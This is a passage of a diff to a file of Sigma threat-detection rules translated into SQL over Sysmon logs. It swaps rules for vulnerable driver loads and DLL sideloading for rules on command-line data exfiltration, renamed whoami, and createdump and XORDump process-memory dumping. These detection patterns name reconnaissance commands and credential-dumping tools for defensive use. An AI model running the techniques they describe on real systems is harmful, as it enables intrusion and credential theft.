LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": 
"driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN 
('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files 
(x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses 
the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 